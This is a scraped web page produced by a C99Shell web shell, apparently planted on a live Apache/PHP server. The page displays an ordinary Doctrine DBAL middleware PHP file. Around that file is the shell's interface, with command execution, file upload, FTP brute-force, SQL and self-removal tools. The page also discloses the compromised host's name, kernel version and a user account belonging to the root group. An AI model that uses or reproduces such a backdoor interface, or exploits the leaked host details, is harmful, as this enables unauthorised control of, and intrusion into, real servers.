!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/doctrine/dbal/src/Driver/Middleware/   drwxr-xr-x
Free 28.53 GB of 117.98 GB (24.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AbstractConnectionMiddleware.php (2.76 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Doctrine\DBAL\Driver\Middleware;

use 
Doctrine\DBAL\Driver\Connection;
use 
Doctrine\DBAL\Driver\Result;
use 
Doctrine\DBAL\Driver\ServerInfoAwareConnection;
use 
Doctrine\DBAL\Driver\Statement;
use 
Doctrine\DBAL\ParameterType;
use 
Doctrine\Deprecations\Deprecation;
use 
LogicException;

use function 
get_class;
use function 
method_exists;
use function 
sprintf;

abstract class 
AbstractConnectionMiddleware implements ServerInfoAwareConnection
{
    private 
Connection $wrappedConnection;

    public function 
__construct(Connection $wrappedConnection)
    {
        
$this->wrappedConnection $wrappedConnection;
    }

    public function 
prepare(string $sql): Statement
    
{
        return 
$this->wrappedConnection->prepare($sql);
    }

    public function 
query(string $sql): Result
    
{
        return 
$this->wrappedConnection->query($sql);
    }

    
/**
     * {@inheritDoc}
     */
    
public function quote($value$type ParameterType::STRING)
    {
        return 
$this->wrappedConnection->quote($value$type);
    }

    public function 
exec(string $sql): int
    
{
        return 
$this->wrappedConnection->exec($sql);
    }

    
/**
     * {@inheritDoc}
     */
    
public function lastInsertId($name null)
    {
        if (
$name !== null) {
            
Deprecation::triggerIfCalledFromOutside(
                
'doctrine/dbal',
                
'https://github.com/doctrine/dbal/issues/4687',
                
'The usage of Connection::lastInsertId() with a sequence name is deprecated.',
            );
        }

        return 
$this->wrappedConnection->lastInsertId($name);
    }

    
/**
     * {@inheritDoc}
     */
    
public function beginTransaction()
    {
        return 
$this->wrappedConnection->beginTransaction();
    }

    
/**
     * {@inheritDoc}
     */
    
public function commit()
    {
        return 
$this->wrappedConnection->commit();
    }

    
/**
     * {@inheritDoc}
     */
    
public function rollBack()
    {
        return 
$this->wrappedConnection->rollBack();
    }

    
/**
     * {@inheritDoc}
     */
    
public function getServerVersion()
    {
        if (! 
$this->wrappedConnection instanceof ServerInfoAwareConnection) {
            throw new 
LogicException('The underlying connection is not a ServerInfoAwareConnection');
        }

        return 
$this->wrappedConnection->getServerVersion();
    }

    
/** @return resource|object */
    
public function getNativeConnection()
    {
        if (! 
method_exists($this->wrappedConnection'getNativeConnection')) {
            throw new 
LogicException(sprintf(
                
'The driver connection %s does not support accessing the native connection.',
                
get_class($this->wrappedConnection),
            ));
        }

        return 
$this->wrappedConnection->getNativeConnection();
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.005 ]--